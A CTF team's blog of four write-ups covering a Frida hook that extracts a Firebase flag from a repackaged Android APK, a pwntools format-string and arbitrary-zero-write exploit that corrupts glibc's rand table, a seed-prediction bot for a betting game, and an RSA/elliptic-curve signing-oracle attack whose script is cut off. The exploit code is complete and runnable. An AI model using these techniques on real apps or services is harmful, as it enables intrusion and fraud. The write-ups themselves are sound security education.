ByteTheCookies

Jeanne DHACK CTF 2026 | Mobile Odyssey

Fri, 30 Jan 2026 00:00:00 GMT

Introduction

The first mobile challenge of the Jeanne DHACK CTF 2026 is here! The challenge provides an APK file of a mobile game called Mobile Odyssey, and the goal is to find secret information hidden within the app. Easy, right?

This challenge is not particularly hard if you have experience with mobile app reverse engineering and the right tools. This is my first time using certain tools. Not having a rooted phone makes dynamic reverse engineering challenging.

I spent much more time setting up the environment than solving the challenge, but I finally got the flag.

I used Waydroid for emulation and ADB, as well as Frida. For reverse static analysis, I used JADX and JADX-GUI, plus some other tools like apktool and uber-apk-signer.

Okay, let's start.

Source

All the main logic is here

// filename: GameActivity.java

package com.jeannedhackctf.mobileodyssey;

import android.os.Bundle;
import android.util.Base64;
import android.widget.TextView;
import androidx.appcompat.app.AppCompatActivity;
import androidx.constraintlayout.widget.ConstraintLayout;
import com.google.android.gms.tasks.OnCompleteListener;
import com.google.android.gms.tasks.Task;
import com.google.firebase.ktx.Firebase;
import com.google.firebase.remoteconfig.FirebaseRemoteConfig;
import com.google.firebase.remoteconfig.FirebaseRemoteConfigSettings;
import com.google.firebase.remoteconfig.ktx.RemoteConfigKt;
import java.util.Map;
import kotlin.Metadata;
import kotlin.TuplesKt;
import kotlin.Unit;
import kotlin.collections.MapsKt;
import kotlin.jvm.functions.Function1;
import kotlin.jvm.internal.Intrinsics;
import kotlin.text.Charsets;
import kotlin.text.StringsKt;

/* compiled from: MainActivity.kt */
@Metadata(d1 = {"\u0000.\n\u0002\u0018\u0002\n\u0002\u0018\u0002\n\u0002\b\u0003\n\u0002\u0018\u0002\n\u0000\n\u0002\u0018\u0002\n\u0000\n\u0002\u0010\u000e\n\u0002\b\u0002\n\u0002\u0010\u0002\n\u0000\n\u0002\u0018\u0002\n\u0002\b\u0004\u0018\u00002\u00020\u0001B\u0007¢\u0006\u0004\b\u0002\u0010\u0003J\u0012\u0010\u000b\u001a\u00020\f2\b\u0010\r\u001a\u0004\u0018\u00010\u000eH\u0014J\b\u0010\u000f\u001a\u00020\fH\u0002J\u0012\u0010\u0010\u001a\u0004\u0018\u00010\t2\u0006\u0010\u0011\u001a\u00020\tH\u0002R\u000e\u0010\u0004\u001a\u00020\u0005X\u0082.¢\u0006\u0002\n\u0000R\u000e\u0010\u0006\u001a\u00020\u0007X\u0082.¢\u0006\u0002\n\u0000R\u0010\u0010\b\u001a\u0004\u0018\u00010\tX\u0082\u000e¢\u0006\u0002\n\u0000R\u000e\u0010\n\u001a\u00020\tX\u0082D¢\u0006\u0002\n\u0000¨\u0006\u0012"}, d2 = {"Lcom/jeannedhackctf/mobileodyssey/GameActivity;", "Landroidx/appcompat/app/AppCompatActivity;", "<init>", "()V", "remoteConfig", "Lcom/google/firebase/remoteconfig/FirebaseRemoteConfig;", "statusTextView", "Landroid/widget/TextView;", "retrievedFlag", "", "REMOTE_KEY", "onCreate", "", "savedInstanceState", "Landroid/os/Bundle;", "fetchRemoteConfig", "tryDecodeBase64", "value", "app_debug"}, k = 1, mv = {2, 0, 0}, xi = ConstraintLayout.LayoutParams.Table.LAYOUT_CONSTRAINT_VERTICAL_CHAINSTYLE)
/* loaded from: classes3.dex */
public final class GameActivity extends AppCompatActivity {
    private final String REMOTE_KEY = "sEcre7vALu3";
    private FirebaseRemoteConfig remoteConfig;
    private String retrievedFlag;
    private TextView statusTextView;

    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_game);
        this.statusTextView = (TextView) findViewById(R.id.tv_status);
        TextView textView = this.statusTextView;
        FirebaseRemoteConfig firebaseRemoteConfig = null;
        if (textView == null) {
            Intrinsics.throwUninitializedPropertyAccessException("statusTextView");
            textView = null;
        }
        textView.setText("🔧 En construction\nReviens bientôt pour plus de contenu.");
        this.remoteConfig = RemoteConfigKt.getRemoteConfig(Firebase.INSTANCE);
        FirebaseRemoteConfigSettings configSettings = RemoteConfigKt.remoteConfigSettings(new Function1() { // from class: com.jeannedhackctf.mobileodyssey.GameActivity$$ExternalSyntheticLambda2
            @Override // kotlin.jvm.functions.Function1
            public final Object invoke(Object obj) {
                return GameActivity.onCreate$lambda$0((FirebaseRemoteConfigSettings.Builder) obj);
            }
        });
        FirebaseRemoteConfig firebaseRemoteConfig2 = this.remoteConfig;
        if (firebaseRemoteConfig2 == null) {
            Intrinsics.throwUninitializedPropertyAccessException("remoteConfig");
            firebaseRemoteConfig2 = null;
        }
        firebaseRemoteConfig2.setConfigSettingsAsync(configSettings);
        Map defaults = MapsKt.mapOf(TuplesKt.to(this.REMOTE_KEY, ""));
        FirebaseRemoteConfig firebaseRemoteConfig3 = this.remoteConfig;
        if (firebaseRemoteConfig3 == null) {
            Intrinsics.throwUninitializedPropertyAccessException("remoteConfig");
        } else {
            firebaseRemoteConfig = firebaseRemoteConfig3;
        }
        firebaseRemoteConfig.setDefaultsAsync((Map<String, Object>) defaults);
        fetchRemoteConfig();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public static final Unit onCreate$lambda$0(FirebaseRemoteConfigSettings.Builder remoteConfigSettings) {
        Intrinsics.checkNotNullParameter(remoteConfigSettings, "$this$remoteConfigSettings");
        remoteConfigSettings.setMinimumFetchIntervalInSeconds(3600L);
        return Unit.INSTANCE;
    }

    private final void fetchRemoteConfig() {
        FirebaseRemoteConfig firebaseRemoteConfig = this.remoteConfig;
        if (firebaseRemoteConfig == null) {
            Intrinsics.throwUninitializedPropertyAccessException("remoteConfig");
            firebaseRemoteConfig = null;
        }
        firebaseRemoteConfig.fetchAndActivate().addOnCompleteListener(new OnCompleteListener() { // from class: com.jeannedhackctf.mobileodyssey.GameActivity$$ExternalSyntheticLambda0
            @Override // com.google.android.gms.tasks.OnCompleteListener
            public final void onComplete(Task task) {
                GameActivity.fetchRemoteConfig$lambda$3(this.f$0, task);
            }
        });
    }

    /* JADX INFO: Access modifiers changed from: private */
    public static final void fetchRemoteConfig$lambda$3(final GameActivity this$0, Task task) {
        Intrinsics.checkNotNullParameter(task, "task");
        if (task.isSuccessful()) {
            FirebaseRemoteConfig firebaseRemoteConfig = this$0.remoteConfig;
            if (firebaseRemoteConfig == null) {
                Intrinsics.throwUninitializedPropertyAccessException("remoteConfig");
                firebaseRemoteConfig = null;
            }
            String raw = firebaseRemoteConfig.getString(this$0.REMOTE_KEY);
            Intrinsics.checkNotNull(raw);
            if (StringsKt.isBlank(raw)) {
                raw = null;
            }
            String str = raw;
            if (!(str == null || str.length() == 0)) {
                String maybeDecoded = this$0.tryDecodeBase64(raw);
                String str2 = maybeDecoded;
                this$0.retrievedFlag = !(str2 == null || str2.length() == 0) ? maybeDecoded : raw;
            } else {
                this$0.retrievedFlag = null;
            }
        } else {
            this$0.retrievedFlag = null;
        }
        this$0.runOnUiThread(new Runnable() { // from class: com.jeannedhackctf.mobileodyssey.GameActivity$$ExternalSyntheticLambda1
            @Override // java.lang.Runnable
            public final void run() {
                GameActivity.fetchRemoteConfig$lambda$3$lambda$2(this.f$0);
            }
        });
    }

    /* JADX INFO: Access modifiers changed from: private */
    public static final void fetchRemoteConfig$lambda$3$lambda$2(GameActivity this$0) {
        TextView textView = this$0.statusTextView;
        if (textView == null) {
            Intrinsics.throwUninitializedPropertyAccessException("statusTextView");
            textView = null;
        }
        textView.setVisibility(0);
    }

    private final String tryDecodeBase64(String value) {
        try {
            byte[] decoded = Base64.decode(value, 0);
            Intrinsics.checkNotNull(decoded);
            String str = new String(decoded, Charsets.UTF_8);
            if (StringsKt.isBlank(str)) {
                return null;python
            }
            return str;
        } catch (IllegalArgumentException e) {
            return null;
        }
    }
}

Lets clean and zoom in the relevant parts.

d2 = {"Lcom/jeannedhackctf/mobileodyssey/GameActivity;", "remoteConfig", "Lcom/google/firebase/remoteconfig/FirebaseRemoteConfig;", "REMOTE_KEY", "fetchRemoteConfig", "tryDecodeBase64", "app_debug"} // The metadata shows us some good leaks

 private final String REMOTE_KEY = "sEcre7vALu3";  // The key used to fetch the secret value from Firebase Remote Config
    
 this.remoteConfig = RemoteConfigKt.getRemoteConfig(Firebase.INSTANCE); // Initialize Firebase Remote Config
    
    
    // Main logic function to fetch remote config value
  public static final void fetchRemoteConfig$lambda$3(final GameActivity this$0, Task task) {
      Intrinsics.checkNotNullParameter(task, "task");
      if (task.isSuccessful()) {
          FirebaseRemoteConfig firebaseRemoteConfig = this$0.remoteConfig;
          if (firebaseRemoteConfig == null) {
              Intrinsics.throwUninitializedPropertyAccessException("remoteConfig");
              firebaseRemoteConfig = null;
          }
          String raw = firebaseRemoteConfig.getString(this$0.REMOTE_KEY); // Fetch the value using the REMOTE_KEY
          Intrinsics.checkNotNull(raw);
          if (StringsKt.isBlank(raw)) {
              raw = null;
          }
          String str = raw;
          if (!(str == null || str.length() == 0)) {
              String maybeDecoded = this$0.tryDecodeBase64(raw); // Try to decode the fetched value from Base64
              String str2 = maybeDecoded;
              this$0.retrievedFlag = !(str2 == null || str2.length() == 0) ? maybeDecoded : raw;
          } else {
              this$0.retrievedFlag = null;
          }
      } else {
          this$0.retrievedFlag = null;

Nothing else is present, and the retrieved flags seem not to be used anywhere else. Therefore, we must focus on Firebase Remote Config. The key is "sEcre7vALu3" and the value is Base64-encoded. How do we get the value?

Initially, I believed it was only possible with REMOTE_KEY, but since I didn't know which Firebase instance the app was connected to, I couldn't do anything. So the idea was to launch the app and analyze it dynamically with Frida to capture the remote value once it was fetched.

Solution

Here I downloaded Waydroid, an Android emulation environment for Linux, and installed the apk in it. I started adb, installed the application with waydroid app install. The command did not give any errors, but the application was not installed. I tried again with adb install and got: adb: failed to install mobile_odyssey_v0.0.1.apk: Failure [INSTALL_FAILED_OLDER_SDK: Requires newer sdk version #35 (current version is #33)]. So the problem was that Waydroid uses an older version of Android (33) than the one required by the app (35).

One way to get around the problem is to change the required SDK in the manifest, so I extracted the apk with apktool d mobile_odyssey_v0.0.1.apk and modified the AndroidManifest.xml file by changing the line

from

<uses-sdk android:minSdkVersion="35" android:targetSdkVersion="35" />

<uses-sdk android:minSdkVersion="33" android:targetSdkVersion="35" />

and I rebuilt it with apktool b mobile_odyssey_v0.0.1 -o mobile_odyssey_modded.apk and reinstalled it with adb install mobile_odyssey_modded.apk. And here too, an error: adb: failed to install odyssey_edited-2.apk: Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES: Failed to collect certificates from /data/app/vmdl209082530.tmp/base.apk: Attempt to get length of null array] The application needed to be signed again, so I used uber-apk-signer to sign it again: uber-apk-signer -a mobile_odyssey_modded.apk and obtained the file mobile_odyssey_modded-aligned-signed.apk, which I reinstalled with adb install mobile_odyssey_modded-aligned-signed.apk, and this time the installation was successful.

OK, now we just need to launch the application and we'll have the flag, right? Wrong, the application crashes instantly. Looking at the logs with waydroid logcat | grep -i "AndroidRuntime", I find:

01-30 15:51:47.980  3326  3326 E AndroidRuntime: java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.jeannedhackctf.mobileodyssey/com.jeannedhackctf.mobileodyssey.MainActivity}: java.lang.ClassNotFoundException: Didn't find class "com.jeannedhackctf.mobileodyssey.MainActivity" on path: DexPathList[[zip file "/data/app/~~mF_dXhC8jDmUju1Dx9lK_A==/com.jeannedhackctf.mobileodyssey-Sc7Ypls90RmuTLh9nTJ5Mg==/base.apk"],nativeLibraryDirectories=[/data/app/~~mF_dXhC8jDmUju1Dx9lK_A==/com.jeannedhackctf.mobileodyssey-Sc7Ypls90RmuTLh9nTJ5Mg==/lib/x86_64, /data/app/~~mF_dXhC8jDmUju1Dx9lK_A==/com.jeannedhackctf.mobileodyssey-Sc7Ypls90RmuTLh9nTJ5Mg==/base.apk!/lib/x86_64, /system/lib64, /system/system_ext/lib64, /system/product/lib64]]

This means that the MainActivity class is missing, which is strange because it was present in the original apk. So I reviewed the AndroidManifest.xml file and noticed that the main activity is GameActivity and not MainActivity, so I edited the manifest to change the name of the main activity from MainActivity to GameActivity: from

<activity android:exported="true" android:name=".MainActivity">

<activity android:exported="true" android:name=".GameActivity">

Same steps of rebuilding, signing, and reinstalling, and finally the app launches correctly.

Tada! There's nothing interesting here, just placeholder text. Now, we have to capture the remote configuration value dynamically.

The main idea is to hook the methods. I created a Frida script like this:

// filename: exploit.js
// Ai generated
Java.perform(function () {
    console.log("[*] Injection active. Waiting...");

    var GameActivity = Java.use("com.jeannedhackctf.mobileodyssey.GameActivity");
    var FirebaseRemoteConfig = Java.use("com.google.firebase.remoteconfig.FirebaseRemoteConfig");

    // 1. We intercept the moment when the app tries to decode something
    // This is the "surgical" method
    try {
        GameActivity.tryDecodeBase64.implementation = function (value) {
            console.log("\n[!!!] BINGO! tryDecodeBase64 called!");
            console.log("      Input (Base64): " + value);

            var result = this.tryDecodeBase64(value);
            console.log("      Output (Flag):  " + result);
            return result;
        };
    } catch (e) {
        console.log("[-] Unable to hook tryDecodeBase64 (maybe the class is not loaded yet?)");
    }

    // 2. We intercept Firebase directly (Brute-Force method)
    // If the Activity crashes, Firebase might still work in the background
    FirebaseRemoteConfig.getString.overload('java.lang.String').implementation = function (key) {
        var value = this.getString(key);
        console.log("\n[+] Firebase.getString called for key: " + key);
        console.log("    Returned value: " + value);
        return value;
    };

    // 3. MANUAL TRIGGER
    // We look for a live Activity instance in memory and force the fetch
    Java.choose("com.jeannedhackctf.mobileodyssey.GameActivity", {
        onMatch: function (instance) {
            console.log("\n[+] Found GameActivity instance in memory!");
            console.log("    Attempting to force fetchRemoteConfig()...");
            try {
                // Since fetchRemoteConfig is private, we should make it accessible or call it via reflection if it fails,
                // but Frida often bypasses privacy. We try calling tryDecodeBase64 directly if we have the string.
                // Or we call Firebase's public method ourselves:

                var config = instance.remoteConfig.value; // Access to remoteConfig field (Kotlin property)
                if (config) {
                     var secret = config.getString("sEcre7vALu3");
                     console.log("    [MANUAL TRIGGER] Value read directly: " + secret);
                } else {
                    console.log("    [-] remoteConfig is null in the instance.");
                }

            } catch (e) {
                console.log("    [-] Error in manual trigger: " + e.message);
            }
        },
        onComplete: function () {
            console.log("[*] Memory scan completed.");
        }
    });

});

BINGO!!!

Post notes

Initially, I installed Frida incorrectly and couldn't use the script, so I started looking through the application files in /data/data/com.jeannedhackctf.mobileodyssey/files/ and found the file frc_1:<number>:android: <id>_firebase_activate.json, which contained the encoded flag, but I still wanted to use Frida for the solve because it's OBJECTIVELY cooler (this is possibile only when the application start correctly).

flag: :spoiler[JDHACK{M08ile_@Nd_F1rEb4s3_!s_fun}]

Backdoorctf 2025 | Gamble

Thu, 18 Dec 2025 00:00:00 GMT

Introduction

We are given an executable and some docker files.

Let's open the executable in ghidra.

The program initializes srand with seed time(0). We can login, place a bet, and finally gamble. In gamble, we get five chances to have rand() return a small enough number. In such case, the win function is called which prints the flag.

Analyzing the program, there are two vulnerabilities:

A logic error in the loop of bet() allows to overflow buf to reach local_98 and achieve a format string vulnerability with the printf

2. In gamble() after losing, instead of setting the user money to 0, money is treated as a pointer and 8 bytes at the pointed location are set to 0. This achieves a write 0 where vulnerability. The user money is a variable whose size happens to be 8 bytes, and we can set it during the login.

Based on these vulnerabilities, we can obtain a libc leak using the format string and overwrite libc randtbl entries with 0. Since glibc’s rand() is a stateful PRNG that updates and mixes values stored in randtbl, forcing the table entries to zero collapses the internal state causing the generated values to be zero with higher probability.This technique was inspired by this writeup, which also explains glibc rand() internals in more detail for interested readers.

Installing gdb on the Docker we can look at the stack layout when the format string is triggered, finding that "$33%p" leaks __libc_start_main+122, and that randtbl resides at __libc_start_main + 0x1d8ed0.

Steps of the exploit:

login with user id 0
place bet to leak libc
calculate randtbl address
for i in range(1,9):
- login with user id i, give randbtl + i*8 as money amount
- place bet
- gamble
  - If lucky, flag is printed
  - Otherwise, randbtl + i*8 is set to 0

Exploit:

from pwn import *
from tqdm import trange

host = 'remote.infoseciitr.in'
port = 8004

elf = ELF("./chal")

context.binary = elf
context.terminal = ['konsole', '-e']
context.log_level = logging.WARN

gdbscript = '''
set follow-fork-mode parent
# fmtstr vuln
#break *bet+0x21e

break *rand

#break *gamble+0x138
break *gamble+0x15c
continue
'''

#args.GDB = True
def connection():
    if args.LOCAL:
        c = process([elf.path])
    elif args.GDB:
        c = gdb.debug([elf.path], gdbscript=gdbscript)
    else:
        c = remote(host, port)
    return c

stuff_to_leak = [(33,"__libc_start_call_main", 122), (23, "_rtld_global", 0), (19, "_IO_2_1_stdin_", 0)]
stuff_to_leak = [(33,"__libc_start_call_main", 122)] #only need one if we don't trust libc db :)

assert(len(stuff_to_leak) < 10)

def main():

    c = connection()
    user_idx = -1
    leaks_list = {}
    for index, name , offset in stuff_to_leak:
        
        user_idx += 1
        # login 
        c.sendlineafter(b'> ', b'1')
        c.sendlineafter(b'(0-9): ', f"{user_idx}".encode())
        c.sendlineafter(b'name: ', f'name{user_idx}'.encode())
        c.sendlineafter(b'want: ', b'0')

        # leak libc
        payload = b'Z' * 10 + f'%{index}$p#'.encode()
        payload += b' '*(16 - len(payload))
        assert len(payload) == 16

        c.sendlineafter(b'> ', b'2')
        c.sendlineafter(b'bet: ', f'{user_idx}'.encode())
        c.sendafter(b'Currency): ', payload)
        cur_leak = int(c.recvuntil(b'#', drop=True).decode(),16)
        print(index, hex(cur_leak), name)
        leaks_list[name] = cur_leak - offset
        #c.interactive()

    print(leaks_list)

    #libc_path = libcdb.search_by_symbol_offsets(symbols=leaks_list)
    #libc = ELF(libc_path)
    #print(hex(libc.symbols.randtbl))
    #libc.address = int(leaks_list["__libc_start_call_main"],16) - libc.symbols.__libc_start_call_main
    #libc.save('./libc.so')

    #randtbl = int(leaks_list["__libc_start_call_main"],16) + 0x1d8ed0
    randtbl = leaks_list["__libc_start_call_main"] + 0x1d8ed0

    print("randtbl = ", hex(randtbl))

    randtbl_idx = -1
    for i in trange(10-user_idx):
        user_idx+=1
        randtbl_idx += 1

        # login 1
        c.sendlineafter(b'> ', b'1')
        c.sendlineafter(b'(0-9): ', f'{user_idx}'.encode())
        c.sendlineafter(b'name: ', b'baitdecuchis')
        #c.sendlineafter(b'want: ', str((libc.symbols.unsafe_state + context.bytes * 3) // context.bytes).encode())
        c.sendlineafter(b'want: ', str((randtbl + 8*randtbl_idx) >> 3).encode()) #need to divide by 8

        #bet
        c.sendlineafter(b'> ', b'2')
        c.sendlineafter(b'bet: ', f'{user_idx}'.encode())
        c.sendlineafter(b'Currency): ', b'a')

        # gamble
        c.sendlineafter(b'> ', b'3')
        c.sendlineafter(b'gamble: ', f'{user_idx}'.encode())
        c.recvuntil(b"Press ENTER to gamble...")

        for _ in range(5):
            c.sendline(b'')

            rcvd = c.recvlines(2)
            if b"Congratulations! You guessed it right!" in rcvd:
                print("got lucky")
                c.interactive()
                exit()      
    
    print("got unlucky")

if __name__ == '__main__':
    main()

The loop at the beginning initially leaked multiple libc values in order to use pwntools libcdb.search_by_symbol_offsets to have the offsets calculated automatically. This did not work and we ended up doing the math with hardcoded offsets like the good old times :thumbsup:.

Exploit skeleton provided by Antonio aka simplesso.

flag: flag{r4nd_1s_n0t_truly_r4nd0m_l0l!_57}

CornCTF2025 | Aeronaut

Fri, 21 Nov 2025 00:00:00 GMT

Introduction

The last round of the CyberCup2025 competition was very good, with a challenging CTF. The challenge is a gambling game in which you bet on a multiplier. The goal is to earn 100,000,000 dollars. The game is implemented in Python using WebSocket and uses insecure randomness to generate multipliers. This allows us to predict the next multiplier and exploit the game.

Source

# filename: file.py
def game_loop():
    """Background game loop"""
    round_number = 0
    random.seed(int(time.time()))
    mult_list = [generate_multiplier() for i in range(10000)]
    while True:
        # Start new round
        gs.max_multiplier = mult_list[round_number % 10000]
        round_number += 1
        gs.current_multiplier = 1.0
        gs.game_phase = 'betting'
        gs.round_start_time = time.time()

The seed is technically predictable. Initially, I wasn't sure it would work because the instance might have been activated for too long, which would have made brute forcing impossible. Fortunately, my colleague persuaded me to try it out and it worked very well, requiring only 12 hours of brute forcing in about 10 minutes.

Solution

I created a simple and effective script that takes crash data and uses brute force to compare the seed with the crash streak. Then, I can predict the next crash and automatically place a bet.

# filename: exploit.py

#!/usr/bin/env python3

import asyncio
import random
import time
import socketio
import functools
import concurrent.futures

URL       = "http://localhost:5000"
SIO_PATH  = "/socket.io"
HOUSE     = 0.01
OBS_N     = 10
SEARCH_H  = 12 * 3600  # +- 12 ore
EXEC      = concurrent.futures.ThreadPoolExecutor(max_workers=1)

def _mult(rng, house_edge=HOUSE):
    F = 1 - house_edge
    return (1 / rng.uniform(0.01, 1.0)) * F

def build_seq(seed, n=10_000):
    rng = random.Random(seed)
    return [_mult(rng) for _ in range(n)]

def brute_seed_sync(obs, start, end):
    for seed in range(start, end + 1):
        seq = build_seq(seed)
        for i in range(len(seq) - len(obs) + 1):
            if all(abs(seq[i+j] - obs[j]) < 0.01 for j in range(len(obs))):
                return seed, i
    raise RuntimeError("Seed non trovato")

async def main():
    sio         = socketio.AsyncClient()
    observed    = []
    brute_fut   = None
    seed        = offset = None
    sequence    = None
    idx         = 0
    has_bet     = False
    has_cashed  = False
    balance = None

    @sio.event
    async def connect():
        print(f"[+] connected – waiting {OBS_N} crash…")

    @sio.on("cashout_response")
    async def on_bet_response(data):
        nonlocal balance
        if data.get("success"):
            balance = data.get("balance")
            print(f"[+] Bet accepted. New balance: {balance}")
        else:
            print("[-] Bet failed.")

    @sio.on("game_state")
    async def on_state(d):
        nonlocal brute_fut, seed, offset, sequence, idx, has_bet, has_cashed, balance
        phase = d["phase"]

        if phase == "betting":
            if seed is not None and not has_bet:
                if balance is None:
                    balance = 10
                if sequence is not None:
                    print("[+] Current balance: ",balance)
                    next_crash = sequence[(idx - 1) % 10_000]
                    print(f"[+] Betting – predicted crash: {next_crash:.2f}")
                    await sio.emit("place_bet", {"amount": int(balance)})
                    has_bet = True

        elif phase == "game":
            if seed is not None and has_bet and not has_cashed:
                next_crash = sequence[(idx - 1) % 10_000]
                cashout_at = max(1.01, next_crash - 0.05)
                current_multiplier = float(d.get("multiplier", 1.0))

                if current_multiplier >= cashout_at:
                    print(f"[+] Cashing out at {current_multiplier:.2f} "
                          f"(before predicted crash {next_crash:.2f})")
                    await sio.emit("cashout")
                    has_cashed = True

        elif phase == "ended":
            crash = float(d["multiplier"])
            observed.append(crash)
            print(f"[+] crash #{len(observed)}: {crash:.2f}")

            if brute_fut is None and len(observed) >= OBS_N:
                now   = int(time.time())
                start = now - SEARCH_H
                print(f"[+] brute-force {start} → {now}… (in thread)")
                loop = asyncio.get_running_loop()
                brute_fut = loop.run_in_executor(
                    EXEC,
                    functools.partial(brute_seed_sync,
                                      obs=observed[:OBS_N],
                                      start=start,
                                      end=now)
                )

            if brute_fut is not None and brute_fut.done() and seed is None:
                seed, offset = brute_fut.result()
                sequence = build_seq(seed)
                idx = offset + len(observed)
                print("\n[+]  seed:", seed)
                print("[+]  start offset:", offset)
                print("[+]  current round:", idx % 10_000, "\n")

            if seed is not None:
                next_crash = sequence[idx % 10_000]
                print(f"[+]  Next expected crash: {next_crash:.2f}")
                idx += 1
            has_bet = False
            has_cashed = False


    @sio.on("error")
    async def on_error(msg):
        if "corn{" in msg:
            print("FLAG: ", msg["message"])
            exit(0)
        print("⚠️  server error:", msg)

    await sio.connect(URL, socketio_path=SIO_PATH, transports=["websocket"])
    await sio.wait()

if __name__ == "__main__":
    asyncio.run(main())

flag: :spoiler[corn{1_d0n7_g4mbl3_i_a1w4y5_w1n}]

CornCTF2025 | ECRSA

Fri, 21 Nov 2025 00:00:00 GMT

Introduction

ECRSA was a crypto CTF from cornCTF 2025.

Source

# filename: main.py

#!/usr/bin/env python3
from secret_params import curve_p, a, b, order, secret_point_x, secret_point_y
import os

FLAG = os.getenv("FLAG", "corn{__redacted_redacted_redacted__redacted_redacted_redacted__}").encode()

assert FLAG.startswith(b"corn{") and FLAG.endswith(b"}")
assert len(FLAG) == 64

def sign(m, x):
    if m == 0 or m == 1 or m == n-1:
        print("No weak messages allowed here")
        return None
    try:
        user_point = E.lift_x(x)
    except ValueError:
        print(f"Invalid point: {x} does not describe any point on the curve")
        return None
    sig = pow(m, d, n)
    sig = sig * user_point + secret_point
    return sig.xy()[0], sig.xy()[1]

def verify(sig, m, x):
    try:
        user_point = E.lift_x(x)
    except ValueError:
        print(f"Invalid point: {x} does not describe any point on the curve")
        return False
    sig_point = sig - secret_point
    # don't want to make you wait too long
    # c = sig_point.log(user_point)
    c = 0x69
    c = pow(c, e, n)
    return c == m

assert curve_p.bit_length() == 513
assert order.bit_length() == 513

K = GF(curve_p)
a = K(a)
b = K(b)
K = GF(curve_p)
E = EllipticCurve(K, (a, b))
E.set_order(order)
secret_point = E(secret_point_x, secret_point_y)

flag = int.from_bytes(FLAG, byteorder='big')

p = random_prime(2<<255, lbound=2<<254)
q = random_prime(2<<255, lbound=2<<254)
n = p*q

while flag >= n or n>curve_p or n>order:
    p = random_prime(2<<255, lbound=2<<254)
    q = random_prime(2<<255, lbound=2<<254)
    n = p*q

e = 0x10001
d = pow(e, -1, (p-1)*(q-1))

print("Welcome to my custom signing and verification system!")
print("Here are my public parameters:")
print(f"e: {e}")
print(f"n: {n}")

print(f"Leak: {pow(flag, e, n)}")

while True:
    print("1. Sign\n2. Verify\n3. Exit")
    choice = int(input())
    if choice == 1:
        m = int(input("Enter message: "))
        x = Integer(input("Enter x-coordinate of your point: "))
        sig = sign(m, x)
        print(f"Signature: {sig}")
    elif choice == 2:
        try:
            sig_x = Integer(input("Enter x-coordinate of signature: "))
            sig_y = Integer(input("Enter y-coordinate of signature: "))
            sig = E(sig_x, sig_y)
        except TypeError:
            print("Invalid signature")
            continue
        m = int(input("Enter message: "))
        x = K(Integer(input("Enter x-coordinate of your point: ")))
        if verify(sig, m, x):
            print("Valid signature")
        else:
            print("Invalid signature")
    elif choice == 3:
        break
    else:
        print("Invalid choice")

The flag is simply encrypted with RSA, while the service provides a modified ECDSA signing oracle.

Solution

There are 3 steps to the solution:

Recover the secret_point
Figure out the curve parameters
Obtain the flag

Recovering `secret_point`

This step is really easy as the check in sign for the value of m is done before the modular reduction, therefore sending a multiple of the modulus will pass the check but pow(m, d, n) will result in a 0, meaning sign will give back secret_point

Figuring out the curve parameters

With secret_point now ours and being able to provide sign with any user_point we can query the oracle to obtain a few points on the curve, with said points we can recover the parameters:

def solve_curve_parameters(r):
    points = set()

    for x_in in trange(1, 100):
        try:
            point = sign(r, n+1, x_in)
            points.add(point)
            if len(points) >= 10: # arbitrary
                break
        except:
            continue

		points = list(points)
    dets = []
    for i in range(len(points) - 3):
        (x1, y1), (x2, y2), (x3, y3) = points[i], points[i+1], points[i+2]

		    # Y = y^2 - x^3 -> Y = ax + b (mod p).
        Y1 = y1**2 - x1**3
        Y2 = y2**2 - x2**3
        Y3 = y3**2 - x3**3

				# w := Y1 - Y2 = a(x1 - x2) (mod p)
				# z := Y2 - Y3 = a(x2 - x3) (mod p)
				# So w(x2 - x3) and z(x1 - x2) differ by a multiple of p
        I = (Y1 - Y2) * (x2 - x3) - (Y2 - Y3) * (x1 - x2)

        if I != 0:
            dets.append(I)

    p = gcd(dets)
    dx = x1 - x2
    a = (Y1 - Y2) * pow(dx, -1, p) % p

    # From Y1 = a*x1 + b (mod p), we solve for b.
    b = (Y1 - a * x1) % p

    # Check if (y3^2) % p == (x3^3 + a*x3 + b) % p
    lhs = y3**2 % p
    rhs = (x3**3 + a * x3 + b) % p

    if lhs == rhs:
        return p, a, b

    return None, None, None

Getting the flag

The idea is to use an LSB-Oracle:

$c \equiv m^e \pmod n$ <br> $(2^ec)^d \equiv 2m \pmod n$ <br> the previous value is even if $m \leq n/2$, odd otherwise (because $n$ is odd) <br> so we can construct bit by bit the value of $m$ by multiplying $c$ by $2^e$ each time

In the context of the challenge we need a way to distinguish odd and even values of pow(m, d, n). This can be achieved with a point of order $2$ on the curve, since when pow(m, d, n) is even, multiplying it with our given point $P$ will give the identity, which added to secret_point will give this one back, otherwise we'll get $P$ plus secret_point.

def lsb_oracle(r, P):
    l, u = 0, n

    c = enc_flag
    e2 = pow(2, e, n)
    for _ in trange(n.bit_length()):
        c *= e2
        Q = E(sign(r, c % n, P.xy()[0])) - sp # sp = secret_point
        if Q == E.zero():
            u = (l + u) >> 1
        else:
            l = (l + u) >> 1
    return (l + u) >> 1

Full solve script

#filename: exploit.py
import os
os.environ['TERM'] = 'linux'

from pwn import *
from tqdm import trange

# Signing utility
def sign(r, m, x):
    r.recvuntil(b't\n')
    r.sendline(b'1')
    r.recvuntil(b': ')
    r.sendline(str(m).encode())
    r.recvuntil(b': ')
    r.sendline(str(x).encode())

    r.recvuntil(b': ')
    data = r.recvline(False).decode()[1:-1].split(', ')
    return int(data[0]), int(data[1])


def solve_curve_parameters(r):
    points = set()

    for x_in in trange(1, 100):
        try:
            point = sign(r, n+1, x_in)
            points.add(point)
            if len(points) >= 10: # arbitrary
                break
        except:
            continue

    points = list(points)
    dets = []
    for i in range(len(points) - 3):
        (x1, y1), (x2, y2), (x3, y3) = points[i], points[i+1], points[i+2]

		# Y = y^2 - x^3 -> Y = ax + b (mod p).
        Y1 = y1**2 - x1**3
        Y2 = y2**2 - x2**3
        Y3 = y3**2 - x3**3

		# w := Y1 - Y2 = a(x1 - x2) (mod p)
		# z := Y2 - Y3 = a(x2 - x3) (mod p)
		# So w(x2 - x3) and z(x1 - x2) differ by a multiple of p
        I = (Y1 - Y2) * (x2 - x3) - (Y2 - Y3) * (x1 - x2)

        if I != 0:
            dets.append(I)

    p = gcd(dets)
    dx = x1 - x2
    a = (Y1 - Y2) * pow(dx, -1, p) % p

    # From Y1 = a*x1 + b (mod p), we solve for b.
    b = (Y1 - a * x1) % p

